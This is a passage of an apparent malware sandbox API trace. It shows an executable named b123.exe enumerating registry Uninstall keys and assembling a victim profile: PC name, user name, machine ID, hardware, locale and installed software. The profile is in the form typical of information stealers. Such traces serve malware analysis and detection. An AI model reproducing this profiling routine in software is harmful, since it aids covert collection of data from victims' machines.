No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 " [0235.139] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 ", lpString2="12.0.30501.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0" [0235.139] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\n" [0235.139] RegCloseKey (hKey=0x384) returned 0x0 [0235.139] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x23, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.139] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}") returned 90 [0235.139] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.139] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpcbData=0x197fac*=0x3c) returned 0x0 [0235.139] lstrlenA (lpString="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219") returned 59 [0235.140] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\n", lpString2="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219" [0235.140] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="10.0.40219", lpcbData=0x197fac*=0xb) returned 0x0 [0235.140] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 " [0235.140] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 